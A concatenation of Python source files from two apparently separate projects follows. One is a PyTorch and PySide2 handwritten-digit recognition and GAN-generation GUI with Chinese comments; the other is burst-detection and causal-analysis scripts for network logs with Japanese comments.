super().__init__()
# batch*1*28*28(每次会送入batch个样本,输入通道数1(黑白图像),图像分辨率是28x28)
# 下面的卷积层Conv2d的第一个参数指输入通道数,第二个参数指输出通道数,第三个参数指卷积核的大小
self.conv1 = nn.Conv2d(1, 10, 5) # 输入通道数1,输出通道数10,核的大小5
self.conv2 = nn.Conv2d(10, 20, 3) # 输入通道数10,输出通道数20,核的大小3
# 下面的全连接层Linear的第一个参数指输入通道数,第二个参数指输出通道数
self.fc1 = nn.Linear(20 * 10 * 10, 500) # 输入通道数是2000,输出通道数是500
self.fc2 = nn.Linear(500, 10) # 输入通道数是500,输出通道数是10,即10分类
def forward(self, x):
in_size = x.size(0) # 在本例中in_size=512,也就是BATCH_SIZE的值。输入的x可以看成是512*1*28*28的张量。
out = self.conv1(x) # batch*1*28*28 -> batch*10*24*24(28x28的图像经过一次核为5x5的卷积,输出变为24x24)
out = F.relu(out) # batch*10*24*24(激活函数ReLU不改变形状))
out = F.max_pool2d(out, 2, 2) # batch*10*24*24 -> batch*10*12*12(2*2的池化层会减半)
out = self.conv2(out) # batch*10*12*12 -> batch*20*10*10(再卷积一次,核的大小是3)
out = F.relu(out) # batch*20*10*10
out = out.view(in_size, -1) # batch*20*10*10 -> batch*2000(out的第二维是-1,说明是自动推算,本例中第二维是20*10*10)
out = self.fc1(out) # batch*2000 -> batch*500
out = F.relu(out) # batch*500
out = self.fc2(out) # batch*500 -> batch*10
out = F.log_softmax(out, dim=1) # 计算log(softmax(x))
return out
if __name__ == '__main__':
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu") # 让torch判断是否使用GPU,建议使用GPU环境,因为会快很多
model = ConvNet().to(DEVICE)
my_net = torch.load(r"number.pth") # 模型保存地址
model.load_state_dict(my_net)
model.eval()
img = cv2.imread(r"6.png", 0) # 加载图像,RGB是3通道图像0表示以一通道的灰度图表示
img = cv2.resize(img, (28, 28)) # 缩放到28*28
img = nor(img) # 归一化到0-1
print(img.shape)
import matplotlib.pyplot as plt # 展示这张图像
plt.imshow(img, cmap="gray")
plt.show()
img = torch.from_numpy(img).unsqueeze(0).unsqueeze(0).float().to(DEVICE) # 图像转为tensor格式
output = model(img) # 预测
pred = output.max(1, keepdim=True)[1]
print(pred[0][0].data.cpu().numpy()) # 预测结果为tensor格式,转为numpy数值形式输出,这个值为返回值
--- FILE SEPARATOR ---
import torch.utils.data
from torchvision.utils import save_image
import torch.nn as nn
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class generator(nn.Module):
def __init__(self, input_size, num_feature):
super(generator, self).__init__()
self.fc = nn.Linear(input_size, num_feature) # batch, 3136=1x56x56
self.br = nn.Sequential(
nn.ReLU(True),
nn.InstanceNorm2d(1)
# nn.BatchNorm2d(1),
)
self.downsample1 = nn.Sequential(
nn.Conv2d(1, 50, 3, stride=1, padding=1), # batch, 50, 56, 56
nn.ReLU(True),
# nn.InstanceNorm2d(50)
nn.BatchNorm2d(50)
)
self.downsample2 = nn.Sequential(
nn.Conv2d(50, 25, 3, stride=1, padding=1), # batch, 25, 56, 56
nn.ReLU(True),
# nn.InstanceNorm2d(25)
nn.BatchNorm2d(25),
)
self.downsample3 = nn.Sequential(
nn.Conv2d(25, 1, 2, stride=2), # batch, 1, 28, 28
nn.Tanh()
)
def forward(self, x):
x = self.fc(x)
x = x.view(x.size(0), 1, 56, 56)
x = self.br(x)
x = self.downsample1(x)
x = self.downsample2(x)
x = self.downsample3(x)
return x
if __name__ == '__main__':
DEVICE = "cuda"
G = generator(100, 3136).to(device)
my_net = torch.load("../generator.pth", map_location=torch.device('cpu')) # 加载模型
G.load_state_dict(my_net)
num = 10 # 用户输入需要的图像张数
for i in range(num):
z = torch.randn(1, 100).to(device)
# z = torch.ones(100).unsqueeze(0).to(device)
# z = Variable(torch.randn(1, 100))
fake_img = G(z)
save_image(fake_img, './dccc_test/test_{0}.png'.format(i))
--- FILE SEPARATOR ---
from PySide import QtGui, QtCore
reply = QtGui.QInputDialog.getText(None, "Ouija Central","Enter your thoughts for the day:")
if reply[1]:
# user clicked OK
replyText = reply[0]
else:
# user clicked Cancel
replyText = reply[0] # which will be "" if they clicked CancelCaesar卢尚宇2020年3月24日
--- FILE SEPARATOR ---
from PySide2.QtWidgets import QApplication, QMainWindow, QPushButton, QPlainTextEdit, QMessageBox, QFileDialog, \
QTextBrowser, QLabel
from PySide2.QtUiTools import QUiLoader
from PySide2 import QtGui
from PySide2.QtCore import Signal, QObject,QCoreApplication
from PIL import Image
import torch.utils.data
from torchvision.utils import save_image
import os
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import torch
import torch.nn as nn
import torch.nn.functional as F
import cv2
import numpy as np
from Module.随机生成数字 import generator
import Module.识别数字 as RegconizeNum # 模块从Module包里导入“识别数字”
device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # 没gpu的话就用cpu
class MySignals(QObject):
# 定义一种信号,参赛是str,即文件的地址
ms = Signal(str)
global_ms = MySignals() # 实例化信号
input_num_ms = MySignals()
class ImgWindow(): # 显示图片的窗口
def __init__(self):
super().__init__()
# 使用ui文件导入定义界面类
self.ui = QUiLoader().load('img_window.ui')
self.ui.Button_exit.clicked.connect(self.exit_b) #
global_ms.ms.connect(self.load_img) # 连接信号与槽
def exit_b(self):
os.remove("temp.png") # 删除生成的临时文件
self.ui.close()
def load_img(self, object):
im = Image.open(object) # 这里把原来的jpg转化成png之后打开
im.save('temp.png')
pixmap = QtGui.QPixmap('temp.png')
label = self.ui.img_label
label.setPixmap(pixmap) # 加载图片
label.setScaledContents(True) # 自适应
class InputNumWindow(): # 用户输入图片张数的窗口
def __init__(self):
self.ui = QUiLoader().load('input_num.ui')
self.ui.ok_btn.clicked.connect(self.get_num)
self.ui.cancel_btn.clicked.connect(self.close_ui)
def get_num(self):
num = self.ui.user_input_num.text()
input_num_ms.ms.emit(num)
self.close_ui()
def close_ui(self):
self.ui.close()
class MainWindow(): # 主窗口
def __init__(self):
super().__init__()
# 使用ui文件导入定义界面类
self.ui = QUiLoader().load('my_ui.ui')
self.ui.Button_loadmodel.clicked.connect(self.load_model)
self.ui.Button_openimg.clicked.connect(self.open_img)
self.ui.Button_randnum.clicked.connect(self.open_input_window)
self.ui.Button_consequence.clicked.connect(self.predict_res)
input_num_ms.ms.connect(self.get_mynum)
def get_mynum(self,num):
self.my_num=num
self.input_randnum()
def load_model(self):
FileDialog = QFileDialog(self.ui.Button_loadmodel) # 实例化
FileDialog.setFileMode(QFileDialog.AnyFile) # 可以打开任何文件
model_file, _ = FileDialog.getOpenFileName(self.ui.Button_loadmodel, 'open file', './',
'model files (*.pth)')
# 改变Text里面的文字
self.ui.View_model_log.setPlainText("成功加载模型\n模型路径:" + model_file)
def open_img(self): # 这里和load_model差不多
FileDialog = QFileDialog(self.ui.Button_openimg)
FileDialog.setFileMode(QFileDialog.AnyFile)
image_file, _ = FileDialog.getOpenFileName(self.ui.Button_openimg, 'open file', './Handwriting num pic',
'Image files (*.jpg *.gif *.png *.jpeg)')
if not image_file:
QMessageBox.warning(self.ui.Button_openimg, "警告", "文件错误或打开文件失败!", QMessageBox.Yes)
return
self.ui.View_img_log.setPlainText("成功加载图片\n图片路径:" + image_file)
self.window2 = ImgWindow()
global_ms.ms.emit(image_file) # 注意只有先实例化之后 发送信号 对应的槽才会执行
self.window2.ui.show()
def open_input_window(self):
self.window3 = InputNumWindow()
self.window3.ui.show()
def input_randnum(self):#num_ms是通过messege接受到的图片个数信息
num = int(self.my_num)
G = generator(100, 3136).to(device)
model_file = self.ui.View_model_log.toPlainText().split('路径:')[1] # 模型保存地址
my_net = torch.load(model_file, map_location=torch.device('cpu')) # 加载模型,没gpu的话将内存定位cpu
G.load_state_dict(my_net)
# num = 10 # 用户输入需要的图像张数
filename = "Handwriting num pic"
current_path = os.getcwd() # 返回当前
path_item = os.listdir(current_path) # 返回(列表)将当前目录的所有内容
picfile_path = "{}\Handwriting num pic".format(current_path) # 图片保存进哪个文件夹的路径
if filename not in path_item:
os.mkdir(filename) # 在当前目录创建文件夹
for i in range(num):
z = torch.randn(1, 100).to(device)
# z = torch.ones(100).unsqueeze(0).to(device)
# z = Variable(torch.randn(1, 100))
fake_img = G(z)
path = "./{}/pic_{}.png".format(filename, i + 1) # 保存图片吗的路径
save_image(fake_img, path.format(i))
str = "成功生成{num}张手写数字图\n图片路径:{path}".format(num=num, path=picfile_path)
self.ui.View_randnum_log.setPlainText(str)
def predict_res(self):
image_file = self.ui.View_img_log.toPlainText().split('路径:')[1]
img = cv2.imread(image_file, 0) # 加载图像,RGB是3通道图像0表示以一通道的灰度图表示
img = cv2.resize(img, (28, 28)) # 缩放到28*28
img = RegconizeNum.nor(img) # 归一化到0-1
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu") # 让torch判断是否使用GPU,建议使用GPU环境,因为会快很多
img = torch.from_numpy(img).unsqueeze(0).unsqueeze(0).float().to(DEVICE) # 图像转为tensor格式
model = RegconizeNum.ConvNet().to(DEVICE)
model_file = self.ui.View_model_log.toPlainText().split('路径:')[1] # 模型保存地址
my_net = torch.load(model_file)
model.load_state_dict(my_net)
model.eval()
output = model(img) # 预测
pred = output.max(1, keepdim=True)[1]
self.ui.View_predict_log.setPlainText("预测识别的结果为:" + str(pred[0][0].data.cpu().numpy()))
app = QApplication([])
start = MainWindow()
start.ui.show()
app.exec_()
|
[
"/Module/识别数字.py",
"/Module/随机生成数字.py",
"/QInputDialog.py",
"/my_first.py"
] |
0225kazuki/log_causal_analysis
|
import tools.search_burst as sb
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
'''
burst - burstを探す
edge-coburstのevpairに対して,
ev1とev2共にバーストが起きている日(共起かは見ていない) & エッジが引かれた日
を出している。
'''
def cnt_logs(DUMP_NAME,DATE):
obj = sb.open_dump('dumps/'+str(DATE)+'/'+DUMP_NAME)
return(len(obj))
def get_eday(evp):
argv = []
argv.extend(evp[0].split("_"))
argv.extend(evp[1].split("_"))
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
r = cur.fetchall()
result = []
for i in r:
result.append("".join(i[0].split("-")))
return result
if __name__ == "__main__":
dbname = 's4causality.db'
conn = sqlite3.connect(dbname)
cur = conn.cursor()
edge_burst = sb.open_dump('rp_edge_coburst')
print(len(edge_burst))
burst = sb.open_dump('burst_df')
burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
result = []
for evp in edge_burst['EvPair']:
bday1 = burst[evp[0]].dropna().index.values
bday1 = [str(x).split('T')[0].replace("-","") for x in bday1]
bday2 = burst[evp[1]].dropna().index.values
bday2 = [str(x).split('T')[0].replace("-","") for x in bday2]
bday = list(set(bday1) & set(bday2))
eday = get_eday(evp)
if len(set(bday) & set(eday)) != 0:
anddays = list(set(bday) & set(eday))
result.append((evp,anddays))
with open('burst_burst_all','wb') as f:
pickle.dump(result,f)
conn.close()
exit()
--- FILE SEPARATOR ---
import collections
import pprint
import re
import sys
import time
import numpy as np
import pybursts
import math
from concurrent import futures
from itertools import chain
import pickle
import datetime
import burst_detect_all as bd
def open_dump(dump_file):
with open(dump_file, "rb") as f:
obj = pickle.load(f, encoding="bytes")
return obj
def burst_detect_from_dump(DUMP_NAME):
try:
obj = open_dump(DUMP_NAME)
except:
print("Input should be dump path");exit()
time_list = sorted([x.hour*3600 + x.minute*60 + x.second for x in obj])
# cur_t = -1
#
# for i, t in enumerate(time_list):
# if cur_t == t:
# time_list[i] = round(time_list[i-1]+0.01, 3)
# else:
# cur_t = t
cur_t = time_list[0]
for i, t in enumerate(time_list[1:]):
if cur_t == t:
time_list[i] = round(time_list[i-1]+0.01, 3)
else:
cur_t = t
time_lists = {1:time_list}
print(time_lists)
return bd.burst_detect(time_lists)
if __name__ == "__main__":
print(burst_detect_from_dump(sys.argv[1]))
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
python busrt_detect_all.py
'''
import collections
import pprint
import re
import sys
import time
import numpy as np
import pybursts
import math
from concurrent import futures
from itertools import chain
import pickle
import datetime
import subprocess
'''
レベルの重複削除
Before
[[0 7079 65511]
[1.0 54134 55689]
[2.0 54134 55689]
[3.0 55655 55689]
[4.0 55655 55689]
[5.0 55655 55689]
[6.0 55655 55689]
[7.0 55655 55689]
[8.0 55655 55689]
[9.0 55655 55689]
[10.0 55655 55689]]
After
[[2.0 54134 55689]
[10.0 55655 55689]]
'''
class Node():
def __init__(self, parent, st, en, lv, cnt, depth=0):
self.parent = parent # 親
self.st = st # データ
self.en = en
self.lv = lv
self.cnt = cnt
self.children = [] # 子
self.depth = depth
def add_node(self, added_node): # ノード追加
self.children.append(added_node)
added_node.parent = self
added_node.depth = self.depth + 1
def dens(self): # 1min間の発生件数を返す
if self.en - self.st == 0:
return 0
else:
return round(self.cnt / (self.en - self.st) * 60, 2)
def value(self):
return [self.lv, self.st, self.en, self.cnt, self.dens()]
# p_numプロセスでバースト検知。time_listsをデータ数が多い順にp_nu個に分配して渡す。
def m_burst_detect(time_lists, p_num):
if p_num > len(time_lists):
p_num = len(time_lists)
row_lists = sorted(time_lists.items(),
key=lambda x: len(x[1]),
reverse=True)
arg_lists = []
for i in range(p_num):
arg_lists.append({k: v for e, (k, v) in enumerate(row_lists)
if e % p_num == i})
pool = futures.ProcessPoolExecutor(max_workers=p_num)
return(list(chain.from_iterable(pool.map(burst_detect, arg_lists))))
def burst_detect(time_lists):
burst_result = []
for ind, v in time_lists.items():
time_list = list(v) # 参照渡しではなくコピー
if len(time_list) > 30: # 量でフィルタ
# 最初と最後が0と86400じゃなかったら臨時で追加
# if time_list[-1] < 86400:
# time_list.append(86400)
# if time_list[0] != 0:
# time_list.insert(0, 0)
# バースト検知
burst_list = pybursts.kleinberg(sorted(set(time_list)),
s=2, gamma=1.0)
# ここで重複レベルを削除
for j in range(len(burst_list)-1):
if not any([x-y for x, y in zip(burst_list[j][1:],
burst_list[j+1][1:])]): # 始点と終点が一緒だったら
burst_list[j] = [0, 0, 0]
burst_list = np.delete(burst_list, np.where(burst_list == 0)[0], 0)
# ここでintervalが1min超える場合は削除
# burst_list = check_interval(burst_list, time_list)
# バーストツリー生成開始
root_node = Node(None, 0, 0, 0, 0) # ルートノード
for lv, st, en in burst_list:
# 初期化
parent_node = root_node
isadded = 0
burst_cnt = len([z for z in time_list if st <= z <= en])
new_node = Node(None, st, en, lv, burst_cnt)
while isadded == 0:
for child_node in parent_node.children: # 子供を順次比較していく
if child_node.st <= new_node.st \
and child_node.en >= new_node.en: # 包含関係チェック
# 包含関係にあり、比較対象の子供がいない時は
# そのまま追加して終わり
if child_node.children == []:
child_node.add_node(new_node)
isadded = 1
break
else:
# 包含関係にあり、比較対象の子供がいる場合は
# 親交代して比較
parent_node = child_node
break
else: # 包含関係になかったら、次の子供と比較
pass
else: # どの子供とも包含関係になかったら追加して終わり
parent_node.add_node(new_node)
isadded = 1
# バーストツリー生成終了, root_node以下に格納。
# バーストツリー表示
# print(ind, 'result')
# show_burst_tree(root_node)
#バーストツリー走査
# parent_node = root_node
# result_node = []
# while True:
# for cur_node in parent_node.children:
# if cur_node.children == [] :
# result_node.append(cur_node)
#
# # cur_nodeの密度がどの子供の密度より2倍以上ある時
# elif any(cur_node.dens > x.dens * 2
# for x in cur_node.children) :
# result_node.append(cur_node)
# else : #半分以下の密度でない子供がいる時
# 暫定listが残っていたらresultに追加
if len(burst_list) != 0:
# 第一層の子供の結果を全部入れる
burst_result.append((ind,
[z.value() for z in root_node.children]))
return burst_result
# バーストツリー表示
def show_burst_tree(parent_node):
for i in range(parent_node.depth):
print('\t', end='')
print('[',
parent_node.lv,
parent_node.st,
parent_node.en,
parent_node.cnt,
parent_node.dens(),
']')
for child in parent_node.children:
show_burst_tree(child)
# 1groupのtime listを受ける。
def check_interval(burst_range, group_time_list):
if burst_range == []:
return burst_range
burst_range_result = []
sub_list = []
for lv, s, e in burst_range:
sub_list = [y - x for x, y
in zip(group_time_list[:-1],
group_time_list[1:])
if s <= x <= e and s <= y <= e]
if max(sub_list) <= 60 * 2: # 最大インターバルが2分以内であること
sub_list_count = collections.Counter(sub_list)
over_1min_interval_rate = sum([x for k, x in sub_list_count.items()
if k > 60]) / len(sub_list)
if over_1min_interval_rate < 0.5:
burst_range_result.append([lv, s, e])
sub_list = []
else:
print('interval check hit', lv, s, e)
return burst_range_result
def get_dumpname(day):
evs = subprocess.check_output(['ls','dumps/{0}'.format(day)]).decode('utf-8')[:-1].split("\n")
return evs
if __name__ == '__main__':
days = subprocess.check_output(['ls','dumps']).decode('utf-8')[:-1].split('\n')
for day in days:
print(day)
for DUMP_NAME in get_dumpname(day):
with open('dumps/'+day+'/'+DUMP_NAME, "rb") as f:
obj = pickle.load(f, encoding="bytes")
if len(obj) == 0:
print(day,DUMP_NAME,'\tno data')
continue
dt_day = datetime.datetime.strptime(day,"%Y%m%d")
time_list = sorted([x.hour*3600 + x.minute*60 + x.second for x in obj if x.date() == dt_day.date()])
cur_t = -1
for i, t in enumerate(time_list):
if cur_t == t:
time_list[i] = round(time_list[i-1]+0.01, 3)
else:
cur_t = t
time_lists = {day:time_list}
burst_result = m_burst_detect(time_lists, 4)
with open('burst_result/'+day+'/'+day+'_'+DUMP_NAME,'wb') as g:
if burst_result != []:
pickle.dump((DUMP_NAME,burst_result[0][0],burst_result[0][1]), g)
else:
pickle.dump((DUMP_NAME,day),g)
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
'''
burst - noburstを探す
'''
def cnt_logs(DUMP_NAME,DATE):
obj = sb.open_dump('dumps/'+str(DATE)+'/'+DUMP_NAME)
return(len(obj))
def get_eday(evp):
argv = []
argv.extend(evp[0].split("_"))
argv.extend(evp[1].split("_"))
# print(argv)
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
r = cur.fetchall()
# print(r)
result = []
for i in r:
result.append("".join(i[0].split("-")))
return result
if __name__ == "__main__":
dbname = 's4causality.db'
conn = sqlite3.connect(dbname)
cur = conn.cursor()
cur.execute('''select srcID,srcHost,dstID,dstHost from event''')
edge = cur.fetchall()
edge = [sorted((str(e[0])+"_"+e[1],str(e[2])+"_"+e[3])) for e in edge]
edge = [e[0]+"."+e[1] for e in edge]
edge = list(set(edge))
edge = [set(e.split(".")) for e in edge]
print(len(edge))
co_burst = sb.open_dump('co_prob_df')
co_burst = list(co_burst['EvPair'].values)
co_burst = [set(x) for x in co_burst]
burst = sb.open_dump('burst_df')
burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
burst_noburst = []
for ep in edge:
if ep not in co_burst:
ep = list(ep)
if ep[0] in burst_ev:
burst_noburst.append(ep)
if ep[1] in burst_ev:
burst_noburst.append(ep[::-1])
result = []
for evp in burst_noburst:
bday = burst[evp[0]].dropna().index.values
bday = [str(x).split('T')[0].replace("-","") for x in bday]
eday = get_eday(evp)
if len(set(bday) & set(eday)) != 0:
anddays = list(set(bday) & set(eday))
days = []
for andday in anddays:
if cnt_logs(evp[1],andday):
days.append(andday)
else:
continue
result.append((evp,days))
with open('partial_burst','wb') as f:
pickle.dump(result,f)
conn.close()
exit()
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
import search_burst as sb
'''
バースト結果をdfにする
burst_result/*/* -> burst_df[index = date, colmuns = events]
'''
def burst2get_data(burst_file):
# get_data = collections.defaultdict(lambda: 0)
get_data = sb.open_dump('burst_file')
for line in open(burst_file,"r"):
if line[0] == '(':
get_date = "".join([a.strip().zfill(2) for a in line[1:-2].split(",")])
get_data[get_date] = []
elif line.strip()[0] == "[":
st = line.strip()[1:-2].split(",")[1].strip()
en = line.strip()[1:-2].split(",")[2].strip()
get_data[get_date].append((float(st),float(en)))
return get_data
def create_burst_df():
files = glob.glob('burst_result/*/*')
evs = sorted(list(set(["_".join(fi.split('/')[-1].split("_")[1:]) for fi in files])))
cols = evs
burst_df = pd.DataFrame(index=pd.date_range('20120101','20130331'), columns=cols)
for fi in files:
event_name = "_".join(fi.split('/')[-1].split('_')[1:])
print(fi)
try: # some bursts are detected
ev,day,data = sb.open_dump(fi)
except: # no bursts are detected
continue
if event_name != ev:
print('event name error')
print(event_name,ev,day,data)
continue
else:
d = pd.to_datetime(day)
burst_df.loc[d,ev] = data
return burst_df
# def search_day(burst_dict):
# for date in pd.date_range('20120301','20130331'):
# date = date.date()
#
# event_list = []
# for event in burst_dict:
# if burst_dict[event][date] != 0:
# event_list
if __name__ == "__main__":
burst_df = create_burst_df()
with open('burst_df','wb') as f:
pickle.dump(burst_df,f)
# search_day(burst_dict)
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
coburst, edgeプロット
'''
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import pybursts
import datetime
import matplotlib.dates as mdates
import pickle
import search_burst as sb
co_prob_df = sb.open_dump('co_prob_df')
co_edge_df = sb.open_dump('rp_edge_coburst')
xj = co_prob_df['x']
yj = co_prob_df['y_jaccard'] * (10 ** 5 )
xs = co_prob_df['x']
ys = co_prob_df['y_simpson'] * (10 ** 5 )
xej = co_edge_df['x']
yej = co_edge_df['y_jaccard'] * (10 ** 5 )
xes = co_edge_df['x']
yes = co_edge_df['y_simpson'] * (10 ** 5 )
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:3]=='10_' or x[1][:3]=='11_') or (x[0][:3]=='11_' or x[1][:3]=='10_')]:
df_bool |= co_prob_df['EvPair']==i
x1 = co_prob_df[df_bool]['x']
y1j = co_prob_df[df_bool]['y_jaccard'] * (10 ** 5 )
y1s = co_prob_df[df_bool]['y_simpson'] * (10 ** 5 )
for i in [0,1]:
kind = ['jaccard','simpson'][i]
fig = plt.figure(figsize=(10,6))
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15, right=0.9)
y = [yj,ys][i]
x = [xj,xs][i]
plt.scatter(x,y, marker='.', c=None, color='gray', label='no causality')
y = [y1j,y1s][i]
x = x1
# plt.scatter(x,y, marker='.', c=None, color='blue', label='"Show interface" command')
# edge plot
y = [yej,yes][i]
x = [xej,xes][i]
plt.scatter(x,y, marker='o', c=None, color='red', label='causality')
plt.yscale("log")
plt.xticks(fontsize='18')
plt.yticks([10 ** i for i in range(1,6)],
['$10^{-4}$','$10^{-3}$','$10^{-2}$','$10^{-1}$','1.0'],
fontsize='25')
plt.ylim(1., 10. ** 5 + 10 ** 4)
plt.grid()
plt.xlabel(r'$|A \cup B|$', fontsize='23')
ax.xaxis.set_label_coords(0.5, -0.13)
if i==0:
ax.set_ylabel(r'$J(A,B)$', fontsize='23')
else:
ax.set_ylabel(r'$S(A,B)$', fontsize='23')
ax.yaxis.set_label_coords(-0.15, 0.5)
plt.legend(prop={'size':20},loc='lower left')
# plt.savefig('{0}_edge.png'.format(kind))
plt.savefig('{0}_edge.eps'.format(kind))
xj = co_prob_df['x']
yj = co_prob_df['y_jaccard']
xs = co_prob_df['x']
ys = co_prob_df['y_simpson']
xej = co_edge_df['x']
yej = co_edge_df['y_jaccard']
xes = co_edge_df['x']
yes = co_edge_df['y_simpson']
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:3]=='10_' and x[1][:3]=='11_') or (x[0][:3]=='11_' and x[1][:3]=='10_')]:
df_bool |= co_prob_df['EvPair']==i
x1 = co_prob_df[df_bool]['x']
y1j = co_prob_df[df_bool]['y_jaccard']
y1s = co_prob_df[df_bool]['y_simpson']
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:4]=='176_' and x[1][:4]=='401_') or (x[0][:4]=='401_' and x[1][:4]=='176_')]:
df_bool |= co_prob_df['EvPair']==i
x2 = co_prob_df[df_bool]['x']
y2j = co_prob_df[df_bool]['y_jaccard']
y2s = co_prob_df[df_bool]['y_simpson']
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:4]=='135_' or x[1][:4]=='376_') or (x[0][:4]=='376_' or x[1][:4]=='135_')]:
df_bool |= co_prob_df['EvPair']==i
x3 = co_prob_df[df_bool]['x']
y3j = co_prob_df[df_bool]['y_jaccard']
y3s = co_prob_df[df_bool]['y_simpson']
for i in [0,1]:
kind = ['jaccard','simpson'][i]
fig = plt.figure(figsize=(10,6))
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15, right=0.9)
# edge plot
y = [yej,yes][i]
x = [xej,xes][i]
plt.scatter(x,y, marker='o', c=None, color='red', label='causality')
y = [yj,ys][i]
x = [xj,xs][i]
plt.scatter(x,y, marker='.', c=None, color='gray', label='no causality')
y1=[y1j,y1s][i]
y2=[y2j,y2s][i]
y3=[y3j,y3s][i]
plt.scatter(x1,y1, marker='.', c=None, color='blue', label='"show interface" cmd')
plt.scatter(x2,y2, marker='.', c=None, color='green', label='"MPLS path/bypath up"')
plt.scatter(x3,y3, marker='.', c=None, color='orange', label='"MPLS path/bypath down"')
plt.yticks(fontsize='25')
plt.xticks(fontsize='18')
# plt.yticks([i*0.1 for i in range(10)])
# plt.ylim(0.1,1.02)
plt.xlim(0,100)
plt.grid()
plt.xlabel(r'$|A \cup B|$', fontsize='23')
ax.xaxis.set_label_coords(0.5, -0.13)
if i==0:
ax.set_ylabel(r'$J(A,B)$', fontsize='23')
else:
ax.set_ylabel(r'$S(A,B)$', fontsize='23')
ax.yaxis.set_label_coords(-0.15, 0.5)
# plt.legend(prop={'size':8},loc='upper right')
# plt.legend(bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0.)
plt.savefig('{0}_edge_01.png'.format(kind))
# plt.savefig('{0}_edge.eps'.format(kind))
--- FILE SEPARATOR ---
import sqlite3
import numpy as np
import pandas as pd
if __name__ == "__main__":
with open("rp_edge_result",'r') as f:
all_data=[i.strip() for i in f.readlines()]
event_df = pd.DataFrame(columns=['srcID','srcHost','dstID','dstHost','direction','date'])
date_df = pd.DataFrame(columns=['edgeID','date'])
lt_df = pd.DataFrame(columns=['ltid','lt'])
i = 0
line = all_data
while i<len(all_data):
if 'term : ' in line[i]:
date = line[i].split()[2]
elif 'undirected' in line[i]:
direc = 0
elif 'directed' in line[i]:
direc = 1
elif 'src>' in line[i]:
srcID = line[i].split()[2]
srcHost = line[i].split()[6][:-1]
elif 'dst>' in line[i]:
dstID = line[i].split()[2]
dstHost = line[i].split()[6][:-1]
event_df = event_df.append(pd.Series([srcID,srcHost,dstID,dstHost,direc,date],index=event_df.columns),ignore_index=True)
i+=1
dbname = 's4causality.db'
conn = sqlite3.connect(dbname)
cur = conn.cursor()
cur.execute('''create table event (pairID integer primary key, srcID int, srcHost txt, dstID int, dstHost txt, direction int)''')
for row in event_df.ix[:,:5].drop_duplicates().iterrows():
cur.execute('''insert into event(srcID, srcHost, dstID, dstHost, direction) values({0[0]},"{0[1]}",{0[2]},"{0[3]}",{0[4]})'''.format(row[1].values[:5]))
cur.execute('''create table date (id integer primary key, pairID integer, date text)''')
for row in event_df.iterrows():
cur.execute('''select pairID from event where srcID={0[0]} and srcHost="{0[1]}" and dstID={0[2]} and dstHost="{0[3]}" and direction={0[4]}'''.format(row[1].values[:5]))
pairID = cur.fetchall()[0][0]
cur.execute('''insert into date(pairID, date) values({0},"{1}")'''.format(pairID, row[1].values[-1]))
conn.commit()
conn.close()
--- FILE SEPARATOR ---
import sqlite3
import numpy as np
import pandas as pd
if __name__ == "__main__":
with open("rp_edge_result",'r') as f:
line=[i.strip() for i in f.readlines()]
# event_df = pd.DataFrame(columns=['srcID','srcHost','dstID','dstHost','direction','date'])
# date_df = pd.DataFrame(columns=['edgeID','date'])
lt_df = pd.DataFrame(columns=['ltid','lt'])
i = 0
# line = all_data
while i<len(line):
# if 'term' in line[i]:
# date = line[i].split()[2]
# elif 'undirected' in line[i]:
# direc = 0
# elif 'directed' in line[i]:
# direc = 1
if 'src>' in line[i]:
ltID = line[i].split()[2]
i+=1
lt = line[i]
if ltID in lt_df['ltid']:
if lt_df[lt_df['ltid'] == ltID]['lt'] != lt:
print('error');exit()
else:
lt_df = lt_df.append(pd.Series([ltID,lt],index=lt_df.columns),ignore_index=True)
elif 'dst>' in line[i]:
ltID = line[i].split()[2]
i+=1
lt = line[i]
# print(lt_df['ltid'].values)
# print('10' in lt_df['ltid'].values);exit()
if ltID in lt_df['ltid'].values:
# print(lt_df,'\n',ltID,lt_df[lt_df['ltid'] == ltID]['lt'].values == lt);exit()
if (lt_df[lt_df['ltid'] == ltID]['lt'].values != lt)[0]:
print('error');exit()
else:
lt_df = lt_df.append(pd.Series([ltID,lt],index=lt_df.columns),ignore_index=True)
i+=1
# dbname = 's4causality.db'
# conn = sqlite3.connect(dbname)
# cur = conn.cursor()
#
# cur.execute('''create table lt (ltID int, lt txt)''')
# for row in lt_df.ix[:,:5].drop_duplicates().iterrows():
# cur.execute('''insert into event(srcID, srcHost, dstID, dstHost, direction) values({0[0]},"{0[1]}",{0[2]},"{0[3]}",{0[4]})'''.format(row[1].values[:5]))
#
# conn.commit()
# conn.close()
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
